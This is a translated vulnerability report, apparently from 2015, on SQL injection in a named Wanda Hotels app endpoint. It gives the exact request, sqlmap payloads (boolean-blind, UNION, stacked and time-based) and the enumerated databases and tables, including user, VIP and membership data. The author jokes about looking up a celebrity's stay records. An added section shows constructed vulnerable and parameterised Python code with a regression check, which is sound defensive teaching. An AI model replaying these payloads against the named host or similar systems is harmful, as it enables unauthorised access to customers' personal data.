
Wanda Hotels (wanda_hotal): SQL injection in an APP affecting membership and user data

2015-12-26 04:58

Does the title feel a bit like clickbait? Fine, I admit it.

1. Cursed programmers who pay no attention to security; I'm off to find Wang Sicong.

Injection point:

POST http://app.wandahotels.com/hotelprocess/membership/getMembershipList.action HTTP/1.1
Content-Length: 6
Content-Type: application/x-www-form-urlencoded
Host: app.wandahotels.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

code=1



2. The injection point is the code parameter

Parameter: code
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: code=1 AND 3632=3632

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: code=1 UNION ALL SELECT NULL, CHAR(58)+CHAR(120)+CHAR(118)+CHAR(110)+CHAR(58)+CHAR(70)+CHAR(70)+CHAR(99)+CHAR(116)+CHAR(119)+CHAR(104)+CHAR(81)+CHAR(67)+CHAR(121)+CHAR(74)+CHAR(58)+CHAR(114)+CHAR(115)+CHAR(104)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: code=1; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: code=1 WAITFOR DELAY '0:0:5'--
---
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] wyhappdb



3. The wyhappdb database has quite a few tables, and important ones

Database: wyhappdb
[72 tables]
+-------------------------------+
| dbo.code_couponType           |
| dbo.code_opera                |
| dbo.code_purview              |
| dbo.code_resource             |
| dbo.complaint                 |
| dbo.coupon                    |
| dbo.department                |
| dbo.group_hot                 |
| dbo.group_locate              |
| dbo.group_story               |
| dbo.hotel                     |
| dbo.hotelGrade                |
| dbo.hotel_facility            |
| dbo.hotel_facility_desc       |
| dbo.hotel_facility_type       |
| dbo.hotel_image               |
| dbo.hotels_group              |
| dbo.index_image               |
| dbo.login_info                |
| dbo.menus                     |
| dbo.menus_resources           |
| dbo.position                  |
| dbo.resources                 |
| dbo.roomTypeUpgrade           |
| dbo.roomType_point            |
| dbo.sysdiagrams               |
| dbo.user                      |
| dbo.wd_about                  |
| dbo.wd_clause                 |
| dbo.wd_coupon                 |
| dbo.wd_coupon_count           |
| dbo.wd_exchange_his           |
| dbo.wd_feedback               |
| dbo.wd_point_rules            |
| dbo.wd_version                |
| dbo.wh_about                  |
| dbo.wh_city                   |
| dbo.wh_clause                 |
| dbo.wh_complaint              |
| dbo.wh_cooking                |
| dbo.wh_coupon                 |
| dbo.wh_cuisine                |
| dbo.wh_dish                   |
| dbo.wh_feedback               |
| dbo.wh_group                  |
| dbo.wh_group_hot              |
| dbo.wh_group_locate           |
| dbo.wh_group_story            |
| dbo.wh_hotel                  |
| dbo.wh_hotel_facility         |
| dbo.wh_hotel_facility_desc    |
| dbo.wh_hotel_facility_type    |
| dbo.wh_hotel_image            |
| dbo.wh_hotel_restaurant_group |
| dbo.wh_hotel_specialty_group  |
| dbo.wh_hotels_group           |
| dbo.wh_index_image            |
| dbo.wh_jobs                   |
| dbo.wh_login_info             |
| dbo.wh_membership             |
| dbo.wh_menus                  |
| dbo.wh_menus_resources        |
| dbo.wh_news                   |
| dbo.wh_newtype                |
| dbo.wh_periodical             |
| dbo.wh_privilege              |
| dbo.wh_privilege_hotel_group  |
| dbo.wh_resources              |
| dbo.wh_restaurant_group       |
| dbo.wh_specialty              |
| dbo.wh_version                |
| dbo.wh_vip                    |
+-------------------------------+

4. Might the user and vip tables contain Wang Sicong?

That table holds the room check-in records; I won't go looking, for fear of being taken in for "coffee".

Fix:

How about 20 rank?
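The report's fix section says nothing about the code itself, so here is an added example (not from the report, and not the Wanda Hotels application's code) of why the code parameter above is exploitable and what the repair looks like. It uses an in-memory SQLite database as a stand-in for the MSSQL wyhappdb; the wh_membership schema, the rows, and the function names are all constructed for illustration. The vulnerable function concatenates the parameter into the SQL text, which is the defect behind every technique sqlmap listed; the two repaired variants bind the value as a parameter, and the stricter one also validates it as an integer so malformed requests fail loudly and can be logged, instead of silently returning nothing. The boolean_blind_signal helper is the regression check a team would keep in its test suite after such a fix: it replays the report's own true/false pair and confirms the two responses are no longer distinguishable.

```python
import sqlite3

# Constructed sample data for a hypothetical wh_membership table
# (id, code, level); not taken from the real wyhappdb database.
SAMPLE_ROWS = [
    (1, 1, "gold"),
    (2, 1, "silver"),
    (3, 2, "platinum"),
]


def build_db():
    """Create an in-memory SQLite stand-in for the membership table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wh_membership (id INTEGER, code INTEGER, level TEXT)")
    conn.executemany("INSERT INTO wh_membership VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def get_membership_list_vulnerable(conn, code):
    """Concatenate the request parameter into the SQL text (the defect).

    Whatever the client sends in `code` becomes part of the statement, so an
    appended condition such as "1 AND 3632=3632" is evaluated by the database.
    """
    sql = "SELECT id, level FROM wh_membership WHERE code = " + code
    return conn.execute(sql).fetchall()


def get_membership_list_bound_only(conn, code):
    """Bind the raw parameter without validating it.

    The driver ships the value separately from the statement, so the whole
    string "1 AND 3632=3632" is compared as one literal against the integer
    column and matches nothing; it is never parsed as SQL.
    """
    sql = "SELECT id, level FROM wh_membership WHERE code = ?"
    return conn.execute(sql, (code,)).fetchall()


def get_membership_list_fixed(conn, code):
    """Validate the parameter as an integer, then bind it.

    Rejecting malformed input up front turns an injection attempt into a
    clean client error that can be logged and alerted on.
    """
    if not code.isdigit():
        raise ValueError("code must be a non-negative integer")
    sql = "SELECT id, level FROM wh_membership WHERE code = ?"
    return conn.execute(sql, (int(code),)).fetchall()


def boolean_blind_signal(conn, fetch):
    """Regression check: True if a true and a false appended condition yield
    different results, i.e. if `fetch` still evaluates caller-supplied SQL.

    Uses the same true/false pair sqlmap reported for this endpoint; a fixed
    implementation must return False here.
    """
    try:
        true_case = fetch(conn, "1 AND 3632=3632")
        false_case = fetch(conn, "1 AND 3632=3633")
    except ValueError:
        return False  # validation rejected the input before any query ran
    return true_case != false_case


if __name__ == "__main__":
    db = build_db()
    print("vulnerable :", boolean_blind_signal(db, get_membership_list_vulnerable))
    print("bound only :", boolean_blind_signal(db, get_membership_list_bound_only))
    print("validated  :", boolean_blind_signal(db, get_membership_list_fixed))
```

On MSSQL the same repair is a JDBC PreparedStatement with setInt for the code value; the stacked WAITFOR DELAY and UNION payloads from the report are neutralised the same way, because a bound value can never terminate or extend the statement.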


Source: 红黑联盟
